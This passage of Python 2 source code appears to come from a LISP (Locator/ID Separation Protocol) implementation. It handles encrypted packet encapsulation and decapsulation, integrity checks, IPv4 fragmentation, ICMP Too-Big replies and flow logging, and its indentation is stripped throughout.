lisp = self.lisp_header.encode()
icv = key.do_icv(lisp + iv + ciphertext, iv)
ps = 4 if (key.do_poly) else 8
string = bold("Encrypt", False)
cipher_str = bold(key.cipher_suite_string, False)
addr_str = "RLOC: " + red(addr_str, False)
auth = "poly" if key.do_poly else "sha256"
auth = bold(auth, False)
icv_str = "ICV({}): 0x{}...{}".format(auth, icv[0:ps], icv[-ps::])
dprint("{} for key-id: {}, {}, {}, {}-time: {} usec".format( \
string, key.key_id, addr_str, icv_str, cipher_str, ts))
icv = int(icv, 16)
if (key.do_poly):
icv1 = byte_swap_64((icv >> 64) & LISP_8_64_MASK)
icv2 = byte_swap_64(icv & LISP_8_64_MASK)
icv = struct.pack("QQ", icv1, icv2)
else:
icv1 = byte_swap_64((icv >> 96) & LISP_8_64_MASK)
icv2 = byte_swap_64((icv >> 32) & LISP_8_64_MASK)
icv3 = socket.htonl(icv & 0xffffffff)
icv = struct.pack("QQI", icv1, icv2, icv3)
#endif
return([iv + ciphertext + icv, True])
#enddef
def decrypt(self, packet, header_length, key, addr_str):
#
# Do ICV first. If it succeeds, then decrypt. Get ICV from packet and
# truncate packet to run hash over. Compare packet hash with computed
# hash.
#
if (key.do_poly):
icv1, icv2 = struct.unpack("QQ", packet[-16::])
packet_icv = byte_swap_64(icv1) << 64
packet_icv |= byte_swap_64(icv2)
packet_icv = lisp_hex_string(packet_icv).zfill(32)
packet = packet[0:-16]
ps = 4
hash_str = bold("poly", False)
else:
icv1, icv2, icv3 = struct.unpack("QQI", packet[-20::])
packet_icv = byte_swap_64(icv1) << 96
packet_icv |= byte_swap_64(icv2) << 32
packet_icv |= socket.htonl(icv3)
packet_icv = lisp_hex_string(packet_icv).zfill(40)
packet = packet[0:-20]
ps = 8
hash_str = bold("sha", False)
#endif
lisp = self.lisp_header.encode()
#
# Get the IV and use it to decrypt and authenticate..
#
if (key.cipher_suite == LISP_CS_25519_CHACHA):
iv_len = 8
cipher_str = bold("chacha", False)
elif (key.cipher_suite == LISP_CS_25519_GCM):
iv_len = 12
cipher_str = bold("aes-gcm", False)
else:
iv_len = 16
cipher_str = bold("aes-cbc", False)
#endif
iv = packet[0:iv_len]
#
# Compute ICV over LISP header and packet payload.
#
computed_icv = key.do_icv(lisp + packet, iv)
p_icv = "0x{}...{}".format(packet_icv[0:ps], packet_icv[-ps::])
c_icv = "0x{}...{}".format(computed_icv[0:ps], computed_icv[-ps::])
if (computed_icv != packet_icv):
self.packet_error = "ICV-error"
funcs = cipher_str + "/" + hash_str
fail = bold("ICV failed ({})".format(funcs), False)
icv_str = "packet-ICV {} != computed-ICV {}".format(p_icv, c_icv)
dprint(("{} from RLOC {}, receive-port: {}, key-id: {}, " + \
"packet dropped, {}").format(fail, red(addr_str, False),
self.udp_sport, key.key_id, icv_str))
dprint("{}".format(key.print_keys()))
#
# This is the 4-tuple NAT case. There another addr:port that
# should have the crypto-key the encapsulator is using. This is
# typically done on the RTR.
#
lisp_retry_decap_keys(addr_str, lisp + packet, iv, packet_icv)
return([None, False])
#endif
#
# Advance over IV for decryption.
#
packet = packet[iv_len::]
#
# Call AES or chacha cipher. Make sure for AES that
#
ts = lisp_get_timestamp()
if (key.cipher_suite == LISP_CS_25519_CHACHA):
decrypt = chacha.ChaCha(key.encrypt_key, iv).decrypt
elif (key.cipher_suite == LISP_CS_25519_GCM):
k = binascii.unhexlify(key.encrypt_key)
try:
decrypt = AES.new(k, AES.MODE_GCM, iv).decrypt
except:
self.packet_error = "no-decrypt-key"
lprint("You need AES-GCM, do a 'pip install pycryptodome'")
return([None, False])
#endtry
else:
if ((len(packet) % 16) != 0):
dprint("Ciphertext not multiple of 16 bytes, packet dropped")
return([None, False])
#endif
k = binascii.unhexlify(key.encrypt_key)
decrypt = AES.new(k, AES.MODE_CBC, iv).decrypt
#endif
plaintext = decrypt(packet)
ts = int(str(time.time() - ts).split(".")[1][0:6])
#
# Now decrypt packet and return plaintext payload.
#
string = bold("Decrypt", False)
addr_str = "RLOC: " + red(addr_str, False)
auth = "poly" if key.do_poly else "sha256"
auth = bold(auth, False)
icv_str = "ICV({}): {}".format(auth, p_icv)
dprint("{} for key-id: {}, {}, {} (good), {}-time: {} usec". \
format(string, key.key_id, addr_str, icv_str, cipher_str, ts))
#
# Keep self.packet the outer header, UDP header, and LISP header.
# We will append the plaintext in the caller once we parse the inner
# packet length so we can truncate any padding the encryptor put on.
#
self.packet = self.packet[0:header_length]
return([plaintext, True])
#enddef
def fragment_outer(self, outer_hdr, inner_packet):
frag_len = 1000
#
# Break up packet payload in fragments and put in array to have
# IP header added in next loop below.
#
frags = []
offset = 0
length = len(inner_packet)
while (offset < length):
frag = inner_packet[offset::]
if (len(frag) > frag_len): frag = frag[0:frag_len]
frags.append(frag)
offset += len(frag)
#endwhile
#
# Now fix outer IPv4 header with fragment-offset values and add the
# IPv4 value.
#
fragments = []
offset = 0
for frag in frags:
#
# Set frag-offset field in outer IPv4 header.
#
fo = offset if (frag == frags[-1]) else 0x2000 + offset
fo = socket.htons(fo)
outer_hdr = outer_hdr[0:6] + struct.pack("H", fo) + outer_hdr[8::]
#
# Set total-length field in outer IPv4 header and checksum.
#
l = socket.htons(len(frag) + 20)
outer_hdr = outer_hdr[0:2] + struct.pack("H", l) + outer_hdr[4::]
outer_hdr = lisp_ip_checksum(outer_hdr)
fragments.append(outer_hdr + frag)
offset += len(frag) / 8
#endfor
return(fragments)
#enddef
def send_icmp_too_big(self, inner_packet):
global lisp_last_icmp_too_big_sent
global lisp_icmp_raw_socket
elapsed = time.time() - lisp_last_icmp_too_big_sent
if (elapsed < LISP_ICMP_TOO_BIG_RATE_LIMIT):
lprint("Rate limit sending ICMP Too-Big to {}".format( \
self.inner_source.print_address_no_iid()))
return(False)
#endif
#
# Destination Unreachable Message - Too Big Message
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 3 | Code = 4 | Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | unused | MTU = 1400 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Internet Header + 64 bits of Original Data Datagram |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
mtu = socket.htons(1400)
icmp = struct.pack("BBHHH", 3, 4, 0, 0, mtu)
icmp += inner_packet[0:20+8]
icmp = lisp_icmp_checksum(icmp)
#
# Build IP header. Make source of ICMP invoking packet the destination
# and our address the source. We can get our address when we thought
# we could encap. So lisp_packet.outer_source has the RLOC address of
# this system.
#
host = inner_packet[12:16]
dest = self.inner_source.print_address_no_iid()
me = self.outer_source.pack_address()
#
# IP_HDRINCL requires the total-length and frag-offset fields to be
# host byte order. We need to build the total-length field just like
# lisp_packet.encode(), checksum, and then fix outer header. So that
# logic is semantically repliciated here. Same logic is in lisp_packet.
# fragment() as well.
#
tl = socket.htons(20+36)
ip = struct.pack("BBHHHBBH", 0x45, 0, tl, 0, 0, 32, 1, 0) + me + host
ip = lisp_ip_checksum(ip)
ip = self.fix_outer_header(ip)
ip += icmp
tb = bold("Too-Big", False)
lprint("Send ICMP {} to {}, mtu 1400: {}".format(tb, dest,
lisp_format_packet(ip)))
try:
lisp_icmp_raw_socket.sendto(ip, (dest, 0))
except socket.error, e:
lprint("lisp_icmp_raw_socket.sendto() failed: {}".format(e))
return(False)
#endtry
#
# Caller function sends packet on raw socket. Kernel routes out
# interface to destination.
#
lisp_last_icmp_too_big_sent = lisp_get_timestamp()
return(True)
def fragment(self):
global lisp_icmp_raw_socket
global lisp_ignore_df_bit
packet = self.fix_outer_header(self.packet)
#
# If inner header is IPv4, we will fragment the inner header and encap
# each fragment. If the inner header is IPv6, we will not add the
# Fragmentation Header into the inner IPv6 packet.
#
length = len(packet)
if (length <= 1500): return([packet], "Fragment-None")
packet = self.packet
#
# Fragment outer IPv4 header if inner packet is IPv6 (or Mac frame).
# We cannot fragment IPv6 packet since we are not the source.
#
if (self.inner_version != 4):
ident = random.randint(0, 0xffff)
outer_hdr = packet[0:4] + struct.pack("H", ident) + packet[6:20]
inner_packet = packet[20::]
fragments = self.fragment_outer(outer_hdr, inner_packet)
return(fragments, "Fragment-Outer")
#endif
#
# Fragment inner IPv4 packet.
#
outer_hdr_len = 56 if (self.outer_version == 6) else 36
outer_hdr = packet[0:outer_hdr_len]
inner_hdr = packet[outer_hdr_len: outer_hdr_len + 20]
inner_packet = packet[outer_hdr_len + 20::]
#
# If DF-bit is set, don't fragment packet. Do MTU discovery if
# configured with env variable.
#
frag_field = struct.unpack("H", inner_hdr[6:8])[0]
frag_field = socket.ntohs(frag_field)
if (frag_field & 0x4000):
if (lisp_icmp_raw_socket != None):
inner = packet[outer_hdr_len::]
if (self.send_icmp_too_big(inner)): return([], None)
#endif
if (lisp_ignore_df_bit):
frag_field &= ~0x4000
else:
df_bit = bold("DF-bit set", False)
dprint("{} in inner header, packet discarded".format(df_bit))
return([], "Fragment-None-DF-bit")
#endif
#endif
offset = 0
length = len(inner_packet)
fragments = []
while (offset < length):
fragments.append(inner_packet[offset:offset+1400])
offset += 1400
#endwhile
#
# Now put inner header and outer header on each fragment.
#
frags = fragments
fragments = []
mf = True if frag_field & 0x2000 else False
frag_field = (frag_field & 0x1fff) * 8
for frag in frags:
#
# Set fragment-offset and MF bit if not last fragment.
#
ff = frag_field / 8
if (mf):
ff |= 0x2000
elif (frag != frags[-1]):
ff |= 0x2000
#endif
ff = socket.htons(ff)
inner_hdr = inner_hdr[0:6] + struct.pack("H", ff) + inner_hdr[8::]
#
# Set length of fragment, set up offset for next fragment-offset,
# and header checksum fragment packet. Then prepend inner header
# to payload.
#
length = len(frag)
frag_field += length
l = socket.htons(length + 20)
inner_hdr = inner_hdr[0:2] + struct.pack("H", l) + \
inner_hdr[4:10] + struct.pack("H", 0) + inner_hdr[12::]
inner_hdr = lisp_ip_checksum(inner_hdr)
fragment = inner_hdr + frag
#
# Change outer header length and header checksum if IPv4 outer
# header. If IPv6 outer header, raw sockets prepends the header.
#
length = len(fragment)
if (self.outer_version == 4):
l = length + outer_hdr_len
length += 16
outer_hdr = outer_hdr[0:2] + struct.pack("H", l) + \
outer_hdr[4::]
outer_hdr = lisp_ip_checksum(outer_hdr)
fragment = outer_hdr + fragment
fragment = self.fix_outer_header(fragment)
#endif
#
# Finally fix outer UDP header length. Byte-swap it.
#
udp_len_index = outer_hdr_len - 12
l = socket.htons(length)
fragment = fragment[0:udp_len_index] + struct.pack("H", l) + \
fragment[udp_len_index+2::]
fragments.append(fragment)
#endfor
return(fragments, "Fragment-Inner")
#enddef
def fix_outer_header(self, packet):
#
# IP_HDRINCL requires the total-length and frag-offset fields to be
# in host byte order. So have to byte-swapped here. But when testing
# we (UPC guys) discovered the frag field didn't need swapping. The
# conclusion is that byte-swapping is necessary for MacOS but not for
# Linux OSes.
#
if (self.outer_version == 4 or self.inner_version == 4):
if (lisp_is_macos()):
packet = packet[0:2] + packet[3] + packet[2] + packet[4:6] + \
packet[7] + packet[6] + packet[8::]
else:
packet = packet[0:2] + packet[3] + packet[2] + packet[4::]
#endif
#endif
return(packet)
#enddef
def send_packet(self, lisp_raw_socket, dest):
if (lisp_flow_logging and dest != self.inner_dest): self.log_flow(True)
dest = dest.print_address_no_iid()
fragments, in_or_out = self.fragment()
for fragment in fragments:
if (len(fragments) != 1):
self.packet = fragment
self.print_packet(in_or_out, True)
#endif
try: lisp_raw_socket.sendto(fragment, (dest, 0))
except socket.error, e:
lprint("socket.sendto() failed: {}".format(e))
#endtry
#endfor
#enddef
def send_l2_packet(self, l2_socket, mac_header):
if (l2_socket == None):
lprint("No layer-2 socket, drop IPv6 packet")
return
#endif
if (mac_header == None):
lprint("Could not build MAC header, drop IPv6 packet")
return
#endif
packet = mac_header + self.packet
# try: l2_socket.send(packet)
# except socket.error, e:
# lprint("send_l2_packet(): socket.send() failed: {}".format(e))
# #endtry
# return
#
# Use tuntap tunnel interface instead of raw sockets for IPv6
# decapsulated packets.
#
l2_socket.write(packet)
return
#enddef
def bridge_l2_packet(self, eid, db):
try: dyn_eid = db.dynamic_eids[eid.print_address_no_iid()]
except: return
try: interface = lisp_myinterfaces[dyn_eid.interface]
except: return
try:
socket = interface.get_bridge_socket()
if (socket == None): return
except: return
try: socket.send(self.packet)
except socket.error, e:
lprint("bridge_l2_packet(): socket.send() failed: {}".format(e))
#endtry
#enddef
def is_lisp_packet(self, packet):
udp = (struct.unpack("B", packet[9])[0] == LISP_UDP_PROTOCOL)
if (udp == False): return(False)
port = struct.unpack("H", packet[22:24])[0]
if (socket.ntohs(port) == LISP_DATA_PORT): return(True)
port = struct.unpack("H", packet[20:22])[0]
if (socket.ntohs(port) == LISP_DATA_PORT): return(True)
return(False)
#enddef
def decode(self, is_lisp_packet, lisp_ipc_socket, stats):
self.packet_error = ""
packet = self.packet
orig_len = len(packet)
L3 = L2 = True
#
# Get version number of outer header so we can decode outer addresses.
#
header_len = 0
iid = 0
if (is_lisp_packet):
iid = self.lisp_header.get_instance_id()
version = struct.unpack("B", packet[0:1])[0]
self.outer_version = version >> 4
if (self.outer_version == 4):
#
# MacOS is zeroing the IP header checksum for a raw socket.
# If we receive this, bypass the checksum calculation.
#
orig_checksum = struct.unpack("H", packet[10:12])[0]
packet = lisp_ip_checksum(packet)
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum != 0):
if (orig_checksum != 0 or lisp_is_macos() == False):
self.packet_error = "checksum-error"
if (stats):
stats[self.packet_error].increment(orig_len)
#endif
lprint("IPv4 header checksum failed for outer header")
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#endif
afi = LISP_AFI_IPV4
offset = 12
self.outer_tos = struct.unpack("B", packet[1:2])[0]
self.outer_ttl = struct.unpack("B", packet[8:9])[0]
header_len = 20
elif (self.outer_version == 6):
afi = LISP_AFI_IPV6
offset = 8
tos = struct.unpack("H", packet[0:2])[0]
self.outer_tos = (socket.ntohs(tos) >> 4) & 0xff
self.outer_ttl = struct.unpack("B", packet[7:8])[0]
header_len = 40
else:
self.packet_error = "outer-header-error"
if (stats): stats[self.packet_error].increment(orig_len)
lprint("Cannot decode outer header")
return(None)
#endif
self.outer_source.afi = afi
self.outer_dest.afi = afi
addr_length = self.outer_source.addr_length()
self.outer_source.unpack_address(packet[offset:offset+addr_length])
offset += addr_length
self.outer_dest.unpack_address(packet[offset:offset+addr_length])
packet = packet[header_len::]
self.outer_source.mask_len = self.outer_source.host_mask_len()
self.outer_dest.mask_len = self.outer_dest.host_mask_len()
#
# Get UDP fields
#
short = struct.unpack("H", packet[0:2])[0]
self.udp_sport = socket.ntohs(short)
short = struct.unpack("H", packet[2:4])[0]
self.udp_dport = socket.ntohs(short)
short = struct.unpack("H", packet[4:6])[0]
self.udp_length = socket.ntohs(short)
short = struct.unpack("H", packet[6:8])[0]
self.udp_checksum = socket.ntohs(short)
packet = packet[8::]
#
# Determine what is inside, a packet or a frame.
#
L3 = (self.udp_dport == LISP_DATA_PORT or
self.udp_sport == LISP_DATA_PORT)
L2 = (self.udp_dport in (LISP_L2_DATA_PORT, LISP_VXLAN_DATA_PORT))
#
# Get LISP header fields.
#
if (self.lisp_header.decode(packet) == False):
self.packet_error = "lisp-header-error"
if (stats): stats[self.packet_error].increment(orig_len)
if (lisp_flow_logging): self.log_flow(False)
lprint("Cannot decode LISP header")
return(None)
#endif
packet = packet[8::]
iid = self.lisp_header.get_instance_id()
header_len += 16
#endif
if (iid == 0xffffff): iid = 0
#
# Time to decrypt if K-bits set.
#
decrypted = False
key_id = self.lisp_header.k_bits
if (key_id):
addr_str = lisp_get_crypto_decap_lookup_key(self.outer_source,
self.udp_sport)
if (addr_str == None):
self.packet_error = "no-decrypt-key"
if (stats): stats[self.packet_error].increment(orig_len)
self.print_packet("Receive", is_lisp_packet)
ks = bold("No key available", False)
dprint("{} for key-id {} to decrypt packet".format(ks, key_id))
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
key = lisp_crypto_keys_by_rloc_decap[addr_str][key_id]
if (key == None):
self.packet_error = "no-decrypt-key"
if (stats): stats[self.packet_error].increment(orig_len)
self.print_packet("Receive", is_lisp_packet)
ks = bold("No key available", False)
dprint("{} to decrypt packet from RLOC {}".format(ks,
red(addr_str, False)))
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#
# Decrypt and continue processing inner header.
#
key.use_count += 1
packet, decrypted = self.decrypt(packet, header_len, key,
addr_str)
if (decrypted == False):
if (stats): stats[self.packet_error].increment(orig_len)
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#endif
#
# Get inner header fields.
#
version = struct.unpack("B", packet[0:1])[0]
self.inner_version = version >> 4
if (L3 and self.inner_version == 4 and version >= 0x45):
packet_len = socket.ntohs(struct.unpack("H", packet[2:4])[0])
self.inner_tos = struct.unpack("B", packet[1:2])[0]
self.inner_ttl = struct.unpack("B", packet[8:9])[0]
self.inner_protocol = struct.unpack("B", packet[9:10])[0]
self.inner_source.afi = LISP_AFI_IPV4
self.inner_dest.afi = LISP_AFI_IPV4
self.inner_source.unpack_address(packet[12:16])
self.inner_dest.unpack_address(packet[16:20])
frag_field = socket.ntohs(struct.unpack("H", packet[6:8])[0])
self.inner_is_fragment = (frag_field & 0x2000 or frag_field != 0)
if (self.inner_protocol == LISP_UDP_PROTOCOL):
self.inner_sport = struct.unpack("H", packet[20:22])[0]
self.inner_sport = socket.ntohs(self.inner_sport)
self.inner_dport = struct.unpack("H", packet[22:24])[0]
self.inner_dport = socket.ntohs(self.inner_dport)
#endif
elif (L3 and self.inner_version == 6 and version >= 0x60):
packet_len = socket.ntohs(struct.unpack("H", packet[4:6])[0]) + 40
tos = struct.unpack("H", packet[0:2])[0]
self.inner_tos = (socket.ntohs(tos) >> 4) & 0xff
self.inner_ttl = struct.unpack("B", packet[7:8])[0]
self.inner_protocol = struct.unpack("B", packet[6:7])[0]
self.inner_source.afi = LISP_AFI_IPV6
self.inner_dest.afi = LISP_AFI_IPV6
self.inner_source.unpack_address(packet[8:24])
self.inner_dest.unpack_address(packet[24:40])
if (self.inner_protocol == LISP_UDP_PROTOCOL):
self.inner_sport = struct.unpack("H", packet[40:42])[0]
self.inner_sport = socket.ntohs(self.inner_sport)
self.inner_dport = struct.unpack("H", packet[42:44])[0]
self.inner_dport = socket.ntohs(self.inner_dport)
#endif
elif (L2):
packet_len = len(packet)
self.inner_tos = 0
self.inner_ttl = 0
self.inner_protocol = 0
self.inner_source.afi = LISP_AFI_MAC
self.inner_dest.afi = LISP_AFI_MAC
self.inner_dest.unpack_address(self.swap_mac(packet[0:6]))
self.inner_source.unpack_address(self.swap_mac(packet[6:12]))
elif (self.lisp_header.get_instance_id() == 0xffffff):
if (lisp_flow_logging): self.log_flow(False)
return(self)
else:
self.packet_error = "bad-inner-version"
if (stats): stats[self.packet_error].increment(orig_len)
lprint("Cannot decode encapsulation, header version {}".format(\
hex(version)))
packet = lisp_format_packet(packet[0:20])
lprint("Packet header: {}".format(packet))
if (lisp_flow_logging and is_lisp_packet): self.log_flow(False)
return(None)
#endif
self.inner_source.mask_len = self.inner_source.host_mask_len()
self.inner_dest.mask_len = self.inner_dest.host_mask_len()
self.inner_source.instance_id = iid
self.inner_dest.instance_id = iid
#
# If we are configured to do Nonce-Echoing, do lookup on source-EID
# to obtain source RLOC to store nonce to echo.
#
if (lisp_nonce_echoing and is_lisp_packet):
echo_nonce = lisp_get_echo_nonce(self.outer_source, None)
if (echo_nonce == None):
rloc_str = self.outer_source.print_address_no_iid()
echo_nonce = lisp_echo_nonce(rloc_str)
#endif
nonce = self.lisp_header.get_nonce()
if (self.lisp_header.is_e_bit_set()):
echo_nonce.receive_request(lisp_ipc_socket, nonce)
elif (echo_nonce.request_nonce_sent):
echo_nonce.receive_echo(lisp_ipc_socket, nonce)
#endif
#endif
#
# If we decrypted, we may have to truncate packet if the encrypter
# padded the packet.
#
if (decrypted): self.packet += packet[:packet_len]
#
# Log a packet that was parsed correctly.
#
if (lisp_flow_logging and is_lisp_packet): self.log_flow(False)
return(self)
#enddef
def swap_mac(self, mac):
return(mac[1] + mac[0] + mac[3] + mac[2] + mac[5] + mac[4])
#enddef
def strip_outer_headers(self):
offset = 16
offset += 20 if (self.outer_version == 4) else 40
self.packet = self.packet[offset::]
return(self)
#enddef
def hash_ports(self):
packet = self.packet
version = self.inner_version
hashval = 0
if (version == 4):
protocol = struct.unpack("B", packet[9])[0]
if (self.inner_is_fragment): return(protocol)
if (protocol in [6, 17]):
hashval = protocol
hashval += struct.unpack("I", packet[20:24])[0]
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
#endif
if (version == 6):
protocol = struct.unpack("B", packet[6])[0]
if (protocol in [6, 17]):
hashval = protocol
hashval += struct.unpack("I", packet[40:44])[0]
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
#endif
return(hashval)
#enddef
def hash_packet(self):
hashval = self.inner_source.address ^ self.inner_dest.address
hashval += self.hash_ports()
if (self.inner_version == 4):
hashval = (hashval >> 16) ^ (hashval & 0xffff)
elif (self.inner_version == 6):
hashval = (hashval >> 64) ^ (hashval & 0xffffffffffffffff)
hashval = (hashval >> 32) ^ (hashval & 0xffffffff)
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
self.udp_sport = 0xf000 | (hashval & 0xfff)
#enddef
def print_packet(self, s_or_r, is_lisp_packet):
if (is_lisp_packet == False):
iaddr_str = "{} -> {}".format(self.inner_source.print_address(),
self.inner_dest.print_address())
dprint(("{} {}, tos/ttl: {}/{}, length: {}, packet: {} ..."). \
format(bold(s_or_r, False),
green(iaddr_str, False), self.inner_tos,
self.inner_ttl, len(self.packet),
lisp_format_packet(self.packet[0:60])))
return
#endif
if (s_or_r.find("Receive") != -1):
ed = "decap"
ed += "-vxlan" if self.udp_dport == LISP_VXLAN_DATA_PORT else ""
else:
ed = s_or_r
if (ed in ["Send", "Replicate"] or ed.find("Fragment") != -1):
ed = "encap"
#endif
#endif
oaddr_str = "{} -> {}".format(self.outer_source.print_address_no_iid(),
self.outer_dest.print_address_no_iid())
#
# Special case where Info-Request is inside of a 4341 packet for
# NAT-traversal.
#
if (self.lisp_header.get_instance_id() == 0xffffff):
line = ("{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + \
"{}/{}, outer UDP: {} -> {}, ")
line += bold("control-packet", False) + ": {} ..."
dprint(line.format(bold(s_or_r, False), red(oaddr_str, False),
self.outer_tos, self.outer_ttl, self.udp_sport,
self.udp_dport, lisp_format_packet(self.packet[0:56])))
return
else:
line = ("{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + \
"{}/{}, outer UDP: {} -> {}, inner EIDs: {}, " + \
"inner tos/ttl: {}/{}, length: {}, {}, packet: {} ...")
#endif
if (self.lisp_header.k_bits):
if (ed == "encap"): ed = "encrypt/encap"
if (ed == "decap"): ed = "decap/decrypt"
#endif
iaddr_str = "{} -> {}".format(self.inner_source.print_address(),
self.inner_dest.print_address())
dprint(line.format(bold(s_or_r, False), red(oaddr_str, False),
self.outer_tos, self.outer_ttl, self.udp_sport, self.udp_dport,
green(iaddr_str, False), self.inner_tos, self.inner_ttl,
len(self.packet), self.lisp_header.print_header(ed),
lisp_format_packet(self.packet[0:56])))
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.inner_source, self.inner_dest))
#enddef
def get_raw_socket(self):
iid = str(self.lisp_header.get_instance_id())
if (iid == "0"): return(None)
if (lisp_iid_to_interface.has_key(iid) == False): return(None)
interface = lisp_iid_to_interface[iid]
s = interface.get_socket()
if (s == None):
string = bold("SO_BINDTODEVICE", False)
enforce = (os.getenv("LISP_ENFORCE_BINDTODEVICE") != None)
lprint("{} required for multi-tenancy support, {} packet".format( \
string, "drop" if enforce else "forward"))
if (enforce): return(None)
#endif
iid = bold(iid, False)
d = bold(interface.device, False)
dprint("Send packet on instance-id {} interface {}".format(iid, d))
return(s)
#enddef
def log_flow(self, encap):
global lisp_flow_log
dump = os.path.exists("./log-flows")
if (len(lisp_flow_log) == LISP_FLOW_LOG_SIZE or dump):
args = [lisp_flow_log]
lisp_flow_log = []
threading.Thread(target=lisp_write_flow_log, args=args).start()
if (dump): os.system("rm ./log-flows")
return
#endif
ts = datetime.datetime.now()
lisp_flow_log.append([ts, encap, self.packet, self])
#endif
def print_flow(self, ts, encap, packet):
ts = ts.strftime("%m/%d/%y %H:%M:%S.%f")[:-3]
flow = "{}: {}".format(ts, "encap" if encap else "decap")
osrc = red(self.outer_source.print_address_no_iid(), False)
odst = red(self.outer_dest.print_address_no_iid(), False)
isrc = green(self.inner_source.print_address(), False)
idst = green(self.inner_dest.print_address(), False)
if (self.lisp_header.get_instance_id() == 0xffffff):
flow += " {}:{} -> {}:{}, LISP control message type {}\n"
flow = flow.format(osrc, self.udp_sport, odst, self.udp_dport,
self.inner_version)
return(flow)
#endif
if (self.outer_dest.is_null() == False):
flow += " {}:{} -> {}:{}, len/tos/ttl {}/{}/{}"
flow = flow.format(osrc, self.udp_sport, odst, self.udp_dport,
len(packet), self.outer_tos, self.outer_ttl)
#endif
#
# Can't look at inner header if encrypted. Protecting user privacy.
#
if (self.lisp_header.k_bits != 0):
error = "\n"
if (self.packet_error != ""):
error = " ({})".format(self.packet_error) + error
#endif
flow += ", encrypted" + error
return(flow)
#endif
#
# Position to inner header.
#
if (self.outer_dest.is_null() == False):
packet = packet[36::] if self.outer_version == 4 else packet[56::]
#endif
protocol = packet[9] if self.inner_version == 4 else packet[6]
protocol = struct.unpack("B", protocol)[0]
flow += " {} -> {}, len/tos/ttl/prot {}/{}/{}/{}"
flow = flow.format(isrc, idst, len(packet), self.inner_tos,
self.inner_ttl, protocol)
#
# Show some popular transport layer data.
#
if (protocol in [6, 17]):
ports = packet[20:24] if self.inner_version == 4 else packet[40:44]
if (len(ports) == 4):
ports = socket.ntohl(struct.unpack("I", ports)[0])
flow += ", ports {} -> {}".format(ports >> 16, ports & 0xffff)
#endif
elif (protocol == 1):
seq = packet[26:28] if self.inner_version == 4 else packet[46:48]
if (len(seq) == 2):
seq = socket.ntohs(struct.unpack("H", seq)[0])
flow += ", icmp-seq {}".format(seq)
#endif
#endof
if (self.packet_error != ""):
flow += " ({})".format(self.packet_error)
#endif
flow += "\n"
return(flow)
#endif
def is_trace(self):
ports = [self.inner_sport, self.inner_dport]
return(self.inner_protocol == LISP_UDP_PROTOCOL and
LISP_TRACE_PORT in ports)
#enddef
#endclass
#
# LISP encapsulation header definition.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = 4341 |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# L |N|L|E|V|I|P|K|K| Nonce/Map-Version |
# I \ +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# S / | Instance ID/Locator-Status-Bits |
# P +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
LISP_N_BIT = 0x80000000
LISP_L_BIT = 0x40000000
LISP_E_BIT = 0x20000000
LISP_V_BIT = 0x10000000
LISP_I_BIT = 0x08000000
LISP_P_BIT = 0x04000000
LISP_K_BITS = 0x03000000
class lisp_data_header():
def __init__(self):
self.first_long = 0
self.second_long = 0
self.k_bits = 0
#enddef
def print_header(self, e_or_d):
first_long = lisp_hex_string(self.first_long & 0xffffff)
second_long = lisp_hex_string(self.second_long).zfill(8)
line = ("{} LISP-header -> flags: {}{}{}{}{}{}{}{}, nonce: {}, " + \
"iid/lsb: {}")
return(line.format(bold(e_or_d, False),
"N" if (self.first_long & LISP_N_BIT) else "n",
"L" if (self.first_long & LISP_L_BIT) else "l",
"E" if (self.first_long & LISP_E_BIT) else "e",
"V" if (self.first_long & LISP_V_BIT) else "v",
"I" if (self.first_long & LISP_I_BIT) else "i",
"P" if (self.first_long & LISP_P_BIT) else "p",
"K" if (self.k_bits in [2,3]) else "k",
"K" if (self.k_bits in [1,3]) else "k",
first_long, second_long))
#enddef
def encode(self):
packet_format = "II"
first_long = socket.htonl(self.first_long)
second_long = socket.htonl(self.second_long)
header = struct.pack(packet_format, first_long, second_long)
return(header)
#enddef
def decode(self, packet):
packet_format = "II"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
first_long, second_long = \
struct.unpack(packet_format, packet[:format_size])
self.first_long = socket.ntohl(first_long)
self.second_long = socket.ntohl(second_long)
self.k_bits = (self.first_long & LISP_K_BITS) >> 24
return(True)
#enddef
def key_id(self, key_id):
self.first_long &= ~(0x3 << 24)
self.first_long |= ((key_id & 0x3) << 24)
self.k_bits = key_id
#enddef
def nonce(self, nonce):
self.first_long |= LISP_N_BIT
self.first_long |= nonce
#enddef
def map_version(self, version):
self.first_long |= LISP_V_BIT
self.first_long |= version
#enddef
def instance_id(self, iid):
if (iid == 0): return
self.first_long |= LISP_I_BIT
self.second_long &= 0xff
